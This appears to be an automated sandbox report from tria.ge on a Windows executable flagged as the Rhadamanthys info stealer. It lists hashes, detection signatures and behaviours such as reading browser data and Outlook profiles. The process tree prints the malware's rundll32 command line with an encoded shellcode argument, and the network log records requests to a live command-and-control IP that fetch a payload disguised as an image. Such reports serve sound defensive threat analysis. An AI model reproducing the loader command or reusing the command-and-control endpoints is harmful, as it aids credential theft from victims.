Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
05/02/2023, 21:21 UTC
Static task
static1
Behavioral task
behavioral1
Sample
a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe
Resource
win10v2004-20221111-en
General
-
Target
a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe
-
Size
248KB
-
MD5
dd70d6f65ac9130bad2fa6e1d212b8c1
-
SHA1
1efd5dbfe68f298292b3c74aa121dc1249bd7528
-
SHA256
a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee
-
SHA512
4a6771a0d400547d432ae461d5700307d3cee2e09377ac8f621a015f15c86e546f85b050700906a3a133d60b117968529bcfccc553afba754e10c769e9ceef78
-
SSDEEP
3072:FPP4OHwhsjezkNL959WwM95NueH39TBxLTEEIFBP1kuu5r:RP4cnj2GL/9PeX9lxLAEIFguu5
Malware Config
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
resource yara_rule behavioral1/memory/4800-135-0x0000000002270000-0x000000000228D000-memory.dmp family_rhadamanthys behavioral1/memory/4800-143-0x0000000002270000-0x000000000228D000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 23 2536 rundll32.exe -
Loads dropped DLL 1 IoCs
pid Process 2536 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Program crash 2 IoCs
pid pid_target Process procid_target 1972 4800 WerFault.exe 78 3756 2536 WerFault.exe 82 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2536 rundll32.exe 2536 rundll32.exe 2536 rundll32.exe 2536 rundll32.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4800 wrote to memory of 2536 4800 a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe 82 PID 4800 wrote to memory of 2536 4800 a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe 82 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook rundll32.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe"C:\Users\Admin\AppData\Local\Temp\a7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\system32\rundll32.exe"C:\Users\Admin\AppData\Roaming\nsis_unse567b9d.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8GT|AG0AagBzADf7ADQfAFQAegBMuwB1TwBJAEQtAln|SIPsKOgEAgD|AEiDxCjDzMz|zEyJRCQYSIn|VCQQSIlMJAj+XQFIi0QkMEiJ2wQkgQE4SG8ACEhvx0QkEC0B6w6BAV8QSIPAAY8BEIEBt0BIOZYAcyWfA4v|DCRIA8hIi8HXSItMqwFUewAD0f9Ii8qKCYgI6|3BZgVlSIsEJWD+8|AzyUiLUBhI|zvRdDZIg8Ig|0iLAkg7wnQq|2aDeEgYdRpM|4tAUGZBgzhru3QHERFLdQgREHj|EC50BUiLAOuv1UiLSP0AwWoAQP9TVVZXQVRBVe9BVkFXXQFmgTn|TVpNi|hMi|K|SIvZD4X88|BM|2NJPEGBPAlQv0UAAA+F6vPwQe+LhAmI8|CFwEi|jTwBD4TWahGDd7wJjC0BD4TH8|D|RItnIESLXxz|i3ckRItPGEz|A+FMA9lIA|H|M8lFhckPhKT+8|BNi8RBixBF|zPSSAPTigKE|8B0HUHByg0Pe77A+gABRAPQvxH|dexBgfqq|A3|fHQOg8EBSYP|wARBO8lzaev|xovBD7cMTkX|iyyLTAPrdFj7M+2qEHRRQYsU|sEA0zPJigJMi9|C6w|BycgRA8je5RABQYoA1RDtM3|AM|ZBOwy24BD+pgCDxgGD+Ahy|+7rCkiLy0H|f9VJiQT3g8XkEH|EBDtvGHKvZgH|QV9BXkFdQVzvX15dWzMXSIHs+2ABZACL6ehm|v|||0iFwA+EmNZ1IEyNrwGLKxDIM|f|6Jt9II1fBEz|jUVGM9KLy||3VCRogCBMi+AP64RrdSBFqBAzwIt905EgSIl8JCCmIP1wgCBIi|APhEv8dSCmIFBIjVYIRH+NR0BIjYwkhRG|SIvY6Hz9fiCNq1ZI3iAQ4iHM8|Do|WfvIESLBo1XCPRBIKYgWMohiYQkgNqHEt7z8IsO2iBYiWOMJHERBzCRIOgx7yD7i5wtMkyLXTpI74P7bEiKIDBMib9kJDhMi6QaMky7iVyEAYQk3IcRhu2SjRGNR0swjCTwfvPwSYvU6On8BTC7ipx4MkiNhHgyQf+A8yGNT2xEMP0YpAKD6QF184H9vHgyIVJleHVN74uEJPQiMZQk+P41AcJIO9hyOIP|+mx2M0SNSUCe+gCUQbgAmACmIECeyiL4dBlEtjDAMUnvjVQkbJEgSYPod2zoa4IwSIvOpiD|eEiF|3QSi1XzQkyOMBsxSI1MJD9A|9dIgcR0IWEkAC0ILQE=2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:2536 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2536 -s 2803⤵
- Program crash
PID:3756
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 7082⤵
- Program crash
PID:1972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4800 -ip 48001⤵PID:3508
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 2536 -ip 25361⤵PID:3528
Network
-
GEThttp://179.43.154.216/img/logo.jpga7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exeRemote address:179.43.154.216:80RequestGET /img/logo.jpg HTTP/1.1
Host: 179.43.154.216
User-Agent: curl/5.9
Connection: close
X-CSRF-TOKEN: YhId6npNWJD5x8Ue23bivIu4MPjlQKAoTGXHJpNlBk0L6UFOsKpRkw0gtSQ94Z3HUGaWxwNRiiqeipaMftXZiQ==
Cookie: CSRF-TOKEN=YhId6npNWJD5x8Ue23bivIu4MPjlQKAoTGXHJpNlBk0L6UFOsKpRkw0gtSQ94Z3HUGaWxwNRiiqeipaMftXZiQ==; LANG=en-US
ResponseHTTP/1.1 200 OK
Date: Sun, 05 Feb 2023 21:21:49 GMT
Content-Type: image/jpeg
Content-Length: 929566
Connection: close
X-Served-By: 179.43.154.216
-
Remote address:179.43.154.216:80RequestGET /img/logo.jpg HTTP/1.1
Host: 179.43.154.216
User-Agent: curl/5.9
Upgrade: websocket
Connection: upgrade
Sec-Websocket-Version: 13
Sec-Websocket-Key: W7Hj1N6MR3WRauE
ResponseHTTP/1.1 101 Switching Protocols
Date: Sun, 05 Feb 2023 21:21:57 GMT
Connection: upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 81YnpkesBm52K7X0tz0EFlgPPho=
-
322 B 7
-
179.43.154.216:80http://179.43.154.216/img/logo.jpghttpa7867748594a9112317189ae39d6e49f8d41ded2aca102209c2a73a13a1126ee.exe21.4kB 957.4kB 433 690
HTTP Request
GET http://179.43.154.216/img/logo.jpgHTTP Response
200 -
75.2kB 2.7kB 66 38
HTTP Request
GET http://179.43.154.216/img/logo.jpgHTTP Response
101 -
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
49KB
MD5832890fded186835970d1d3302590138
SHA15385703e9dcde43e60928b2e9c941b7232468a6a
SHA256438c088568093ad767802ba5e132efbd4e643ddf62e4996565c3b46719e3e576
SHA5125cf752eac75b532b32501c9d469cbcb6638b49cf20df040554b37986cbe3c068a10e2ff69747b594b5b114111cbbe1cdfbbd0f394a7ac71b863e042414a68ae1
-
Filesize
49KB
MD5832890fded186835970d1d3302590138
SHA15385703e9dcde43e60928b2e9c941b7232468a6a
SHA256438c088568093ad767802ba5e132efbd4e643ddf62e4996565c3b46719e3e576
SHA5125cf752eac75b532b32501c9d469cbcb6638b49cf20df040554b37986cbe3c068a10e2ff69747b594b5b114111cbbe1cdfbbd0f394a7ac71b863e042414a68ae1